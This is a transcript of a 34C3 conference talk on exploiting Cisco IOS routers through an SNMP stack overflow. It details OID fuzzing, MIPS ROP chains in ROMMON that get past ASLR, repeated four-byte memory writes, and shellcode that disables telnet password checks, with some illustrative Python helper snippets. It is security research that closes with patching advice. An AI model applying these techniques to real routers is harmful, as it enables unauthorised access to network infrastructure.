34c3 intro
Herald: All right, the next lecture here is from Artem. Besides the fact that he is, how should I put it, probably earning a nice amount of money at a lab that's quite renowned in the world, Kaspersky, in this lecture he's looking at exploit development for Cisco stuff. We all suffered from this last year, or we all heard about it and maybe don't know the impact, but he's going to explain to us the work he did in that field. So can I please ask for your warm welcoming applause for Artem Kondratenko? Okay, good, please give him a warm applause and start.
applause
Artem Kondratenko: Hello everyone, so excited to finally be able to attend Chaos Communication Congress. Very happy to see y'all. So without further ado let's jump into some practical IOS exploitation. A few words about myself: my name is Artem, I do stuff, mostly security-related stuff. My main areas of expertise are penetration tests, both internal and external. I also do research in my free time and get a bug bounty here and there, and this talk is actually kind of a continuation of my talk this summer at DEF CON about Cisco Catalyst exploitation. So for those of you who are out of context, let's recap what happened earlier this year. The year 2017 was rich in vulnerabilities for Cisco IOS devices. We had at least three major advisories for Cisco IOS that represented three remote code execution vulnerabilities. The first one is a vulnerability in the cluster management protocol, which resulted in unauthenticated remote code execution via telnet, the second one is the SNMP overflow, and the third is the DHCP remote code execution. In this lecture I'm going to be talking about two of those vulnerabilities, because the DHCP RCE is yet to be researched. So hopefully by the end of this talk I'm going to be able to show you a live demo of exploiting the SNMP service in Cisco IOS.
But first, what happened earlier: on March 26, 2017 we had a major advisory from Cisco announcing that hundreds of models of different switches were vulnerable to a remote code execution vulnerability. No public code, no public exploit was available, and there was no exploitation in the wild. It was critical, and the main points of the vulnerability were as follows: Cisco switches can be clustered, and there's a cluster management protocol built on top of telnet, and this vulnerability is actually the result of two errors, a logic error and a binary error. The telnet options get parsed regardless of whether the switch is in cluster mode or not, and the incorrect processing of these cluster management protocol options results in an overflow. What is interesting about this vulnerability is that the source of research for the Cisco guys was not internal research but the "Vault 7" leak that happened in March this year. Many hacking techniques and tools were released to the public by WikiLeaks, and among the many vendors that were affected was Cisco Systems. So basically, besides the advisory, you could go to WikiLeaks and read about this potential exploitation technique for Cisco Catalyst. These were the notes of an engineer who was testing the actual exploit; there was no actual exploit in the leak. It worked as follows: there were two modes of interaction. For example, an attacker could connect to telnet, overflow the service and be presented with a privilege level 15 shell. The other mode of operation was the … is to set for all the subsequent … connections to the telnet, there will be … without credentials. So I did rediscover this exploit; the full research was presented at DEF CON 25. I was using a Cisco Catalyst 2960 as the target switch. I also described PowerPC platform exploitation and the way you can debug it. You can look at my blog post about exploiting this service, and also at the proof-of-concept exploit on my GitHub page.
But today I want to talk about something else, about another vulnerability that was announced this year, the SNMP remote code execution. The actual motivation behind this research was that I was conducting an external pentest, and an nmap scan revealed a Cisco router where the default community string was available. The goal was to get access to the internal network. The actual advisory said that the attacker needs a read-only community string to gain remote code execution on the device. The target router was a 2800 integrated services router, which is a very common device on networks. As for the technical specs, it has a MIPS big-endian architecture, you don't have any client debugging tools available for it, and it's interesting in the sense that the firmware is relatively new for this router, so it might be interesting to look at the defensive and exploit prevention mechanisms employed by Cisco IOS. When I say relatively new, the interesting thing is that this device is actually end of support, it's not supported. The last patch for it came out in 2016, and to remind you, the advisory for the SNMP overflow appeared in June 2017, but nonetheless this is still a widely used device. If you search for the SNMP banner on Shodan, you will find at least 3000 devices with the SNMP service available with the default public string. So these devices are all supposedly vulnerable to the SNMP overflow, and the question is whether we can build a remote code execution exploit for it. Since we're going to be exploiting the SNMP protocol, let's make a quick recap of how it works, just a light touch. SNMP comes with several abbreviations like MIB, which stands for management information base and is kind of a collection of objects that can be monitored from the SNMP manager. A management information base actually consists of object identifiers.
As an example: you all know that printers usually use SNMP. If there is a certain level of ink in the cartridge, you can query the SNMP service on the device for the percentage of ink left. So that's an example of how it works. A management information base looks like a tree. You have your base element at the top and your leaf elements, and all these elements represent objects that can be queried. We're going to be looking at get requests, and that is why the advisory states that for the vulnerability to be triggered you only have to know the read-only community string. It's a relatively simple protocol: you just supply the object identifier you're querying and you get back the result. Here, for example, we get the router version, the description field. You can also do this with readily available Linux tools like snmpget. Before we build an exploit, we need a starting point. So how do we look for the crash? The advisory actually states that there are nine different vulnerable management information bases and that you only have to know the read-only community string. For the fuzzing I'll be using Scapy as a toolkit to work with network protocols, and here you can see that I'm building an object identifier, a valid object identifier that references the description field, and then I'm appending some letters "A", which is 65 in the ASCII table. Then I build an IP packet, a UDP packet and an SNMP packet inside of it with the community string public and the object identifier. Of course this will not trigger the overflow, because this object identifier is completely fine. How do we get all the object identifiers that our router will respond to? Basically there are two ways: you can take the firmware and just extract all the OIDs from it. It's easy to grab them, they're stored in plain text.
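As a rough sketch of the firmware route just described, the snippet below scans a binary blob for printable dotted-decimal OIDs and builds fuzzing candidates by appending extra sub-identifiers with the value 65. It assumes the OIDs really are stored as dotted-decimal ASCII strings; the function names, the regular expression and the sample bytes are illustrative and not taken from the talk.

```python
import re

# Assumption: OIDs appear in the unpacked image as printable dotted-decimal
# strings that start with the 1.3.6.1 (internet) prefix.
OID_RE = re.compile(rb"1\.3\.6\.1(?:\.\d{1,10}){2,}")


def extract_oids(blob: bytes) -> list[str]:
    """Return the unique dotted-decimal OIDs found in a binary blob, sorted."""
    return sorted({m.group().decode("ascii") for m in OID_RE.finditer(blob)})


def fuzz_oid(oid: str, count: int, sub_id: int = 65) -> str:
    """Append `count` extra sub-identifiers (65 by default) to a valid OID."""
    return oid + (".%d" % sub_id) * count


# Made-up sample data standing in for an unpacked firmware image.
sample = b"\x00\x01junk1.3.6.1.2.1.1.1.0\x00more\x001.3.6.1.4.1.9.9.95\x00"

for oid in extract_oids(sample):
    print(fuzz_oid(oid, 3))
```

Each candidate string could then be handed to whatever packet builder is used for the actual requests.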
Another way is to actually look at the vulnerable MIBs, visit the website OID views and get all the object identifiers from this website. As a matter of fact, the first crash I had was in ciscoAlpsMIB, which is kind of related to an airline protocol, which does not concern us because it's not the focus of our exploitation. The actual overflow was in one of its object identifiers. So this request actually crashed the router. When you are connected to the Cisco router via a serial cable and there's a crash, you will be presented with a stack trace. We see here that we got a corrupted program counter, and we also see the state of the registers at the moment of the crash. Here you can see that we have control of the program counter, it's called EPC, and we also control the contents of registers s0, s1, s2, s3, s4, s5, s6. Further inspection also showed me that we have 60 spare bytes on the stack to work with. But before we build an exploit we have some problems to solve. And that is: yes, we do control the program counter, but where do we jump to? Is ASLR on? Can we execute shellcode directly on the stack? Is the stack executable? If we can place the shellcode on it, is data caching a problem for us? And if we launched our shellcode, can we just patch the code? Is the code section writable? Is the code integrity check on? But the most important question is: how can we return the code flow back to the SNMP service? Because IOS is a single binary running in memory, and if you have an exception in any thread of this big binary, the Cisco device will crash. And if we look at the advisory, one of the indicators of compromise that Cisco states is a device reload, so exploitation of the vulnerabilities will cause an affected device to reload. We will try to build an exploit that will not crash the SNMP service on it.
Before we dive deeper into the firmware I want to reference previous research on this matter. This is by no means a complete list, but this research actually helped me a lot and seemed interesting and very insightful to me. You should definitely check it out. For example, "Router Exploitation" by Felix "FX" Lindner and "CISCO IOS SHELLCODE" by George Nosenko are great resources for IOS internals and a great reference for how IOS works in terms of exploitation, and the third resource, "How to cook Cisco", has great info on exploiting PowerPC-based Cisco switches and also on bypassing common mechanisms and exploit prevention stuff in IOS. So if I were to tell you how IOS works in one slide: it's basically a single binary running in memory. Everything is statically linked into a single ELF file which gets loaded on startup, and of course you have no API whatsoever. Everything has no symbols whatsoever. Yes, there is a glibc library at the end of the firmware, but it's also kind of hard to use because you have so many different versions of the firmware, the offsets jump and you don't know the exact location of those functions. To start with static analysis you should probably copy the firmware from the flash memory of the router. Use the copy command, it supports the TFTP and FTP protocols. So you download this firmware, and the next thing you do is unpack it. The firmware itself, when the router starts loading it, has an initial stub that does the unpacking, but you don't have to reverse engineer that, you just use binwalk, which will do the unpacking for you. You load the result of unpacking with binwalk into IDA Pro, and you have to change the processor type to MIPS 32 big-endian. We know that this is MIPS because we saw the registers. These registers tell us that it was indeed the MIPS architecture.
One thing I want to note: the actual firmware gets loaded at address 800F00 but the program counter is located at address 4, and this is because IOS, when it loads the firmware, transfers, I mean maps, it to memory 2400F00. This is important because to have correct cross-references in IDA Pro you have to rebase your program to 4, and after that you will have all the correct string cross-references. You will have all the necessary strings and your static analysis setup will be complete. But in order to build an exploit it will not suffice to only have IDA Pro loaded with the firmware with all the cross-references, you probably want to set up a debug environment. It is well known that IOS can be debugged via a serial port, and there's actually a "gdb kernel" command that is used to start the internal gdb server. Or there was, because this functionality was removed in recent versions of IOS and you can't really run gdb that way. But nonetheless there's a way to enable gdb, and this way is to reboot the device and send an escape sequence to the serial line. This will bring up the ROM monitor shell. The ROM monitor (ROMMON) is a simple piece of firmware that gets loaded and run just before your firmware starts running, and in this ROMMON you can manually boot your firmware with a flag which will launch the whole firmware under gdb. After your firmware is loaded, gdb will kick in. Now, you can't just use your favorite gdb debugger on Linux and connect it to IOS via a serial port, because IOS uses a slightly different subset of commands of the gdb protocol. It has a server-side gdb, but the client side has to be adapted to this gdb server. Basically there are no publicly and officially available client-side debugging tools for IOS, and that is because this is intended to be done by Cisco engineers.
There have been some efforts from the community to build tools to debug several versions of routers and switches with IOS, though. If you look for ways to debug Cisco IOS you will most definitely find a tutorial that says you can actually patch an old version of gdb that still supports IOS, but it never really works. I tried it and all I could do was read memory; the stepping, the tracing, it just doesn't work. Another way is to use a cool tool by NCC Group, it's called IODIDE. It's a graphical debugger for IOS, it really works, it's a great tool, but the thing is it only targets the PowerPC architecture and it has some problems; you probably have to patch the debugger to be able to work with it. The third option, the last resort, is to implement your own debugger for the router. To do that you have to know which commands Cisco actually supports, and it's not a lot: you can basically read and write memory and read and write registers, and the only program counter control command is a step instruction. So it's kind of easy to implement such a debugger, because all the information is just sent as plain text over a serial cable and appended with a checksum, which is just a CRC. This way I was able to make a quick Python script using Capstone to debug IOS. You can inspect registers, and there's basic breakpoint management: you just write a special control double word to be able to break. You can step over and step into, and another good feature is being able to dump memory, which we will use later. So how do you find the SNMP overflow in the code? Since we have all the string cross-references, you can follow the strings that reference SNMP get requests and just step until the crash, but a more efficient method is to crash the device and start inspecting the stack after the device has already crashed.
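The crash-first approach can be sketched roughly as follows: take a stack dump, read it as big-endian 32-bit words and keep the word-aligned values that fall inside the code section, since some of those are likely saved return addresses. The text-section bounds and the sample dump below are made-up placeholders, not values from the 2800 firmware.

```python
import struct


def candidate_return_addresses(stack_dump: bytes, text_start: int, text_end: int):
    """Return (offset, value) pairs for words that point into the code range.

    Words are read as big-endian 32-bit values, matching the MIPS
    big-endian target discussed in the talk.
    """
    hits = []
    for offset in range(0, len(stack_dump) - 3, 4):
        (word,) = struct.unpack_from(">I", stack_dump, offset)
        # MIPS instructions are 4-byte aligned, so a return address is too.
        if text_start <= word < text_end and word % 4 == 0:
            hits.append((offset, word))
    return hits


# Hypothetical dump: overflow filler, a code pointer, a small integer, a code pointer.
dump = struct.pack(">4I", 0x41414141, 0x4001A2B4, 0x00000010, 0x40FFFFF0)

for offset, value in candidate_return_addresses(dump, 0x40000000, 0x41000000):
    print("stack+0x%02x -> 0x%08x" % (offset, value))
```

Each hit is only a candidate; it still has to be checked in the disassembler to see whether it follows a call instruction.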
You just have to dump some memory on the stack and look at the values that reference the code. Some of them will be return addresses, and this will give you a hint as to where the crash actually is. The actual program counter corruption happens in the function epilogue. I call this function snmp_stack_overflow. You can see here that at the end of the function we load values from the stack into registers $s0 to $s6, and we also load a value into register $ra. This is an important register, it's called the return address register, and almost every function in MIPS uses this register to jump back to its parent function. So basically we have some space on the stack, but the question is: can we place our shellcode on the stack? And can we execute it? Because the stack location is unpredictable: every time you trigger this vulnerability a separate space on the stack is allocated and you cannot really predict it. There are no valid jump-to-stack instructions in the firmware like we have on Intel x86, such as jmp esp. But even if we could find such an instruction, address space layout randomization (ASLR) is on, which means the code section and data section are based at different offsets each time we reboot the device, so we can't reliably jump to the instruction. Another unfortunate thing is that data caching is also in place. About ASLR: this is the first time I encountered randomization in IOS. Previous researchers that I've been referring to talked a lot about the diversity of the firmware. You had so many different versions of firmware that when you exploited a Cisco device you couldn't really reliably jump to any code, because there's such a vast diversity of different firmware built by different people. But here we actually have address space randomization, and the text section and data section are loaded at different offsets after each reboot.
Another thing that really upsets us is data caching. When we write our shellcode to the stack, we think that it will be on the stack, but what actually happens is that everything gets written into the data cache, and when we point our program counter at the stack we end up executing garbage instructions, which results in a crash once again. So this is basically like data execution prevention. Well, it's not, it's a cache, but the solution to this problem is the same as for data execution prevention, and it is return-oriented programming. Unfortunately we still have ASLR, so we can't really jump to anything because it's at a random offset, but here the ROM monitor that I was talking about comes to our rescue. This little piece of software that gets loaded before the actual firmware might actually help us. The first thing we want to find is where this bare-bones firmware is located. An interesting feature of the ROMMON shell is that it allows you to disassemble arbitrary memory, and if you point the disassembler at an invalid address you will get a stack trace revealing the actual address of the ROM monitor. The ROM monitor is located at bfc00000, and you can dump it using the debugger or you can just search the internet for the version and download it. The most interesting part about this piece of firmware is that the ROM monitor is located at the same address and it's persistent across reboots, which is really great because we can use it for building ROP chains inside of it. So now we have a theoretical possibility of circumventing ASLR and defeating the cache problem. So how do we build an exploit? The overview is as follows: we jump to ROMMON, we initiate a ROP chain which makes an arbitrary write using the code reuse technique, and after that we have to recover the stack frame to allow the SNMP service to restore the legitimate code flow.
This is really important because we will be writing only four bytes at a time, and that is not enough for a full-fledged shellcode. If we don't crash SNMP we can exploit this vulnerability over and over again, thus building the shellcode in memory. After we have built the shellcode we make a jump to it. Here's how it works: we overflow the stack, we overflow the return address so that it points to the ROM monitor, and we jump to the ROM monitor. Then we find a gadget that reuses the data on our stack to make an arbitrary four-byte write just before the text section. Then we have to find a gadget that will recover the stack for us so we can restore the legitimate SNMP execution flow. So this is basically an overview of one cycle of how we write a four-byte double word. Now, a little bit on building ROP chains. What is return-oriented programming? The idea is not to execute the shellcode directly but to use existing code in the binary to execute your payload. You use the stack not as a source of instructions but as data for the code that you're reusing. You take snippets of code, we call them gadgets, and you chain them together with jump or call instructions. A candidate gadget has to meet two requirements: it has to actually execute our payload, and it also has to contain instructions that will transfer the execution flow to the next gadget or, if it's the last gadget, transfer execution back to the SNMP service.
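The four-bytes-per-request cycle described earlier in this passage implies that the shellcode has to be cut into 32-bit words, each paired with the address it will be written to. A minimal sketch of that planning step, assuming big-endian words and a hypothetical staging address (the real address just before the text section is not given in the talk):

```python
import struct


def plan_writes(shellcode: bytes, base_addr: int):
    """Split shellcode into (address, word) pairs, one pair per exploit run.

    The tail is padded with zero bytes; an all-zero word is a nop on MIPS.
    Words are big-endian to match the target architecture.
    """
    padded = shellcode + b"\x00" * (-len(shellcode) % 4)
    return [
        (base_addr + offset, struct.unpack_from(">I", padded, offset)[0])
        for offset in range(0, len(padded), 4)
    ]


# Placeholder bytes, not a working payload; 0x1000 is a made-up staging address.
for address, word in plan_writes(bytes.fromhex("3c08dead3508beef0000"), 0x1000):
    print("write 0x%08x -> 0x%08x" % (word, address))
```

Each pair corresponds to one pass through the overflow, the write gadget and the stack recovery, which is why keeping the SNMP service alive between requests matters.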
The problem with the return-oriented approach is that there is a limited set of gadgets available. If we're talking about the firmware, it's around 200 megabytes of code, so there are plenty of different gadgets there. If we're talking about the ROM monitor, it's only 500 kilobytes of code, so not a lot of code is available. The second major problem is that gadgets, because most of them are function epilogues, modify the stack frame: they delete the local variables as they jump back to the parent function, and you have to account for that because this may crash the process you are exploiting. ROP chains can basically be made to do anything, but most of the time we do arbitrary memory writes, and this can actually lead to arbitrary code execution. The idea when looking for gadgets is that you find a gadget that loads data from the stack into registers and then you find a second gadget that works with the data in those registers. For example, you have one register, $v0, which contains the value you want to write, and another register, $s0, which has the address you want to write to. We also want to find gadgets that load data from the stack into the return address register so we can jump to the next gadget. You don't have to look for these gadgets manually in IDA; there are a lot of different tools for building ROP chains. One of those tools is Ropper, you can find it on GitHub, it's a really handy tool. You just search for the necessary instructions to build the necessary ROP chain. So now the last technical part, how the ROP chains in this particular exploit work, and then we'll get to the demo. This is what a perfectly healthy stack frame looks like. You basically have local variables on the stack, you have the return address, and you also have the stack frames of the parent functions underneath the stack frame of our vulnerable function.
When we overflow the local variables with our long object identifier, here's what happens: these variables partly get written to the $s0 through $s6 general purpose registers. We also, of course, overflow the return address, which will make the jump to the ROM monitor for us, and we also have some 60 bytes after that, where we overflow the stack frame of the next function, and we use that data for our ROP chain as well. What we do here is take the value of $a0, we control the value of $a0 as you remember, and move it to register $v0, and that is solely because there are no other gadgets in the ROM monitor that use $s0 as a target register to write data, so we have to use register $v0. After that, the most important part is that we load the return address from the ROP data too, and we also load the address we will write to from the ROP data. So after this gadget stops executing, $s0 points to the memory we want to write to and $v0 contains the 4 bytes we will be writing just before the code section. The final gadget, the one performing the arbitrary write, takes the value of register $v0 and writes it to the pointer referenced by register $s0, and the last thing it does is transfer control to the gadget that will recover the stack for us. This is the most important gadget, since it allows us to run the exploit several times. You might have noticed that the previous gadgets actually moved the stack pointer 30 bytes in hex down the stack, and this means that the process we return to will crash if we don't point the stack pointer exactly between two stack frames. We find a gadget that will move the stack pointer down by 228 bytes in hex, which will result in a perfectly healthy stack. We also load the return address into register $ra, and it points to the parent function that called our vulnerable function. This way we perform an arbitrary four-byte write.
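To make the data flow of one write cycle easier to follow, here is a toy Python model of the three gadgets as they are described above. It is not the real ROP chain: the register dictionary, the order of the ROP data words and the gadget addresses are hypothetical, and the stack pointer adjustments are left out entirely.

```python
def run_write_cycle(memory, value, target, recover_gadget, parent_return):
    """Toy model of one arbitrary four-byte write (layout is hypothetical)."""
    # State right after the overflow: the attacker controls the source register
    # (named $a0 in the talk) and the words placed past the saved return address.
    regs = {"a0": value}
    rop_data = [target, recover_gadget]

    # Gadget 1: copy the value into $v0, then load $s0 and $ra from the ROP data.
    regs["v0"] = regs["a0"]
    regs["s0"], regs["ra"] = rop_data

    # Gadget 2: store $v0 at the address held in $s0, then jump through $ra.
    memory[regs["s0"]] = regs["v0"]
    next_pc = regs["ra"]

    # Gadget 3 (stack recovery): realign $sp (not modeled here) and reload $ra
    # so that execution returns to the parent of the vulnerable function.
    assert next_pc == recover_gadget
    regs["ra"] = parent_return
    return regs


memory = {}
# All addresses below are made-up placeholders.
regs = run_write_cycle(memory, 0x3C08DEAD, 0x00001000, 0xBFC01234, 0x40012340)
print({hex(k): hex(v) for k, v in memory.items()}, hex(regs["ra"]))
```

The point of the model is only the ordering: value and target come from attacker data, the store happens in ROM monitor code, and the last step hands control back to legitimate SNMP code.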
We can do this several times until our shellcode is actually built just before the text section, and the final thing we do is overflow the stack again and jump to the shellcode. A few words about the shellcode: the device I was working with had a telnet service and it had a password, so I designed a simple shellcode that just patches the authentication code flow. As you can see here, we have a function "login password check", and its result, which is in the $v0 register, is checked to see whether the authentication was successful or not. We can build a shellcode which will just patch the instruction that checks "login password check", and it will allow us to make a credential-less authentication against the telnet service. So what it does: the shellcode inspects the stack and the return address in it to calculate the ASLR offset, because of course ASLR is on for the code section and we want to patch something in it. After that it writes a 0, which is a nop instruction in MIPS, over the call that checks the password for telnet and also the one for the enable password, and then it just jumps back to the SNMP service. So now the long-awaited demo. Let's see if I can make it a live demo. All righty, here we have the serial connection to the device, you can see we have a shell. What we do now is check the password on the telnet service to make sure it's working as intended. So we see "bad passwords". We don't know the valid password for the device. What we do now is launch the actual exploit; as parameters it takes the host, the community and the shellcode in hex. This is the shellcode I was talking about, the one that patches the code flow in authentication. So let's write sudo. Here you see that we start writing the four-byte sequences just before the text section. Basically this writes the shellcode into memory. After the exploit finishes this, we just have to jump to the shellcode. So let's see. Please do not crash. So, yes. So back to the slides.
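The offset arithmetic the shellcode performs, as described before the demo, can be sketched in Python like this. The real payload is MIPS code running on the router; the addresses below are invented placeholders, and the static addresses are assumed to come from the disassembly of the matching firmware image.

```python
NOP = 0x00000000  # an all-zero word is a nop on MIPS
MASK32 = 0xFFFFFFFF


def aslr_slide(runtime_return_addr: int, static_return_addr: int) -> int:
    """Difference between a return address seen on the stack and its static value."""
    return (runtime_return_addr - static_return_addr) & MASK32


def patch_call(memory: dict, static_call_addr: int, slide: int) -> int:
    """Overwrite the instruction at the relocated address with a nop."""
    runtime_addr = (static_call_addr + slide) & MASK32
    memory[runtime_addr] = NOP
    return runtime_addr


# Hypothetical values: one leaked return address and the static address of the
# password-check call taken from the disassembly.
memory = {}
slide = aslr_slide(0x4123A2B4, 0x4003A2B4)
patched = patch_call(memory, 0x40501000, slide)
print("slide=0x%08x patched=0x%08x" % (slide, patched))
```

Because the slide is recomputed from the live stack on every run, the same shellcode keeps working across reboots even though the text section moves.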
And of course you can build a shellcode that will unset this behavior and patch the process back to enable the password. As a side note, how reliably can you exploit this vulnerability? Of course the SNMP public community will leak you the version of the particular router, but it does not leak you the version of ROMMON, and we're constructing ROP chains in the ROM monitor. Actually, there are not that many versions of the ROM monitor available. You have only five if we're talking about the 2800 router. So the worst-case scenario is that you crash it four times. It's not like you have to crash it four thousand times to beat the ASLR. But there's a second option which is interesting. ROMMON is designed to be upgraded, so a system administrator can download a new version and update it, but the thing is that the read-only region that contains the stock ROMMON is always in place and always at the same offset. So even if you updated the ROM monitor, the read-only version of it, the old version that has always been there, will always be at bfc00000. So basically the assumption is that all the devices manufactured at the same time and place will have the same read-only ROM monitor, and you can query the serial number of your router using snmpget. For example, my lab router was manufactured in 2008 in the Czech Republic, and it has the following version of the ROM monitor. So guys, to summarise all this: do not leave default credentials on external networks. Public communities are not designed to be placed on external networks for Shodan to find. Take care of what you expose on external networks. Of course, patch your devices and watch for the end-of-life announcements by Cisco. Sorry? Sure, why not? Alright guys, thank you so much for your attention.
applause
Thanks for having me.
Herald: I suppose there are some questions in this audience, please take a microphone if you can. No one on the internet?
They are flabbergasted there, it seems. Microphone number one.
Mic 1: Yeah, I'm a random network admin and I know that people tend to use the same SNMP community on many of their routers. My view is that basically if you can get read-only access on those routers you will be able to hijack them or use the same principle. So basically, don't use the same SNMP community on all your devices, that would also be something.
Artem Kondratenko: The main thing is to update your routers because it's a patched vulnerability, the patch was released in September of 2017, but if you tend to use end-of-life products like the 2800 router you probably should use a strong community string for it.
Herald: Thank you. Someone else having a question there? Yes, someone on the internet is alive. It's alive.
Signal Angel: Let's try it. Yeah, now I've actually got a microphone. The Internet is asking how much time you put into this whole project.
Artem Kondratenko: Well, working on this exploit consumed around, I'd say, four weeks. Four weeks from discovering the device on the external network to the final exploit. Yes. Thank you.
Herald: I have a question for you as well, maybe. Do you have a lot of volunteers working with you on researching these exploits?
Artem Kondratenko: Volunteers?
Herald: Yeah, I don't know.
Artem Kondratenko: No, actually we don't have any volunteers, this is all part of my work.
Herald: Okay. Thank you very much for this really revealing lecture, if someone wants to...
Artem Kondratenko: Oh, I just forgot to say, is my mic on? Okay, so the actual proof of concept and the debugger will be released in a few days, so the Python script with Capstone and the actual proof of concept, I'll publish them in a week or so.
Herald: Okay, thank you.
34c3 outro
subtitles created by c3subtitles.de in the year 2018. Join, and help us!